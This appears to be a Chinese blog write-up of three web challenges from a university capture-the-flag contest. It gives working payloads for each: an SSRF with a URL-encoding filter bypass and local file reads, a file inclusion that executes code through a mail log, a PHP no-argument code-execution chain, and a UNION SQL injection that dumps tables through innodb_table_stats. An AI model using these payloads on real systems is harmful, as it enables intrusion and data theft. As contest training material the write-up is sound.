上海大学生网络安全大赛 web write up

这周做了一下,贴出做出来的web题。

babyt5

  • strpos对参数解码存在问题
  • 通过.%2570hp绕过
  • 访问?x=file:///var/www/html/flag.%2570hp得到hint:/etc/hosts
  • 访问/etc/host得到内网网段,经过http://爆破,得到02网段存在web服务,访问之,发现是一个任意文件包含
<!-- include $_GET[a]; -->
  • 利用dict://探测该主机端口,得到25端口存在SMTP服务,查看/etc/passwd确认。
  • filter伪协议base64编码读取www-data的日志,发现大量后门。
  • payload
?x=http://172.18.0.2/?a=/var/mail/www-data%261=readfile('/Th7s_Is_Flag');

flag{add386bb8e04d516c1e33d91cb939fbf}

decade

首先构造数字46
chr(next(ord(strrev(crypt(serialize(array())))));# 有概率得到46

chdir(next(scandir(chr(ord(strrev(crypt(serialize(array()))))))));#改变目录

echo(implode(file(end(scandir(chr(ord(strrev(crypt(serialize(array()))))))))));#读取文件

把第二个和第三个合起来得到payload:
echo(implode(file(end(scandir(chr(ord(strrev(crypt(serialize(array(chdir(next(scandir(chr(ord(strrev(crypt(serialize(array())))))))))))))))))));

多访问几次就能getflag了
在这里插入图片描述

flag{a6776a20-858b-443a-9dbe-688337afd0db}

easysql

简单查看一下网页,注入点应该在这
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-1RweqpU8-1572947415587)(https://i.imgur.com/U8zVTfl.png)]

简单fuzz一下,发现过滤了如下(可能不全)
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-jtl9qhdi-1572947415588)(https://i.imgur.com/uA0UdwL.png)]

我们使用如下语句可以查看到数据库版本,和库名

id=0' union/**/select * from (select 1)a join (select database())b join (select 3)c join (select version())d %23

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-FlDFln75-1572947415588)(https://i.imgur.com/ZNLrLPU.png)]

这边过滤了or,我们就不能使用imformation_schema了,但是这边mysql的版本是5.6.46 ,有新特性,innodb_index_stats和 innodb_table_stats。
所以直接爆表

id=0' union/**/select * from (select 1)a join (select group_concat(table_name) from mysql.innodb_table_stats where database_name=schema())b join (select 3)c join (select version())d %23

结果如下
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-IbxvzSK3-1572947415589)(https://i.imgur.com/BBDRK3o.png)]

这下就很简单了,无列名注入,直接出flag。

id=0' union/**/select * from (select 2)a join (select * from cccttffff.fl111aa44a99g)b%23

在这里插入图片描述
flag{189c8b6bfa1d2f11127f2f4e1fe5efa4}

发布了28 篇原创文章 · 获赞 5 · 访问量 1万+

猜你喜欢

转载自blog.csdn.net/qq_43342566/article/details/102921112